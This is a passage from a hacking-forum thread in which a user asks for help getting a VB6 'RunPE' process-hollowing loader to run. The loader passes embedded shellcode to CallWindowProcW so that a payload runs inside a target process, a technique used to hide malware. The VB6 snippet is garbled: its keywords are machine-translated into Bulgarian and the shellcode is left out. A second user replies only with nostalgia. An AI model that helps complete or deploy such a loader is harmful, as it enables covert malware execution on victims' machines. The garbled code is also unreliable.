process hollowing

1337day

Yeni üye
19 May 2016
4
0
Process-Hollowing/Source/Process Hollowing/Process_Hollowing.cpp at main · adamhlt/Process-Hollowing - runpe

Здравейте, извлякох shellcode от този runpe, след което се опитах да го вградя във vb6, кодът изглежда така. Когато стартирам изпълнимия файл, получавам „Werefault“, въпреки че няма грешка при компилиране. Подозирам, че тук е проблемът.

"CallWindowProcW VarPtr(shellcode(0)), VarPtr(payload(0)), StrPtr(path), 0, 0"

и най-вече
"CallWindowProcW VarPtr(shellcode(0))"
Мисля, че трябва да каже на Runpe от кой байт да започне изпълнението, но нямам представа. Някакви идеи? Мисля, че няма "0"

Private Declare Function CallWindowProcW Lib "USER32" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) Докато

Public Sub RunPE(ByVal payload() Като байт, ByVal път като низ)
Dim ShellCode като низ
shellcode = "shellcode.............
............."

Dim byteArray() като байт
ReDim byteArray((Len(ShellCode) \ 2) - 1) 'прочетени байтове
За i = 1 To Len(ShellCode) Стъпка 2
byteArray(k) = CByte("&H" & Mid$(ShellCode, i, 2)) k = k + 1
Следваща i

CallWindowProcW VarPtr(shellcode(0)), VarPtr(payload(0)), StrPtr(path), 0, 0
End Sub

Как да използвам
runpe.exe <полезен товар> <целеви процес>

o kadar aptalım ki vb6 64 bit dosyaları derleyemiyorum….
 

N S

Uzman üye
19 Haz 2013
1,134
204
vay be gençlik yıllarıma gittim :) nostalji iyi ama geçerliliği olmayan ölü alıntı konular açmak iyi mi bilmem
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.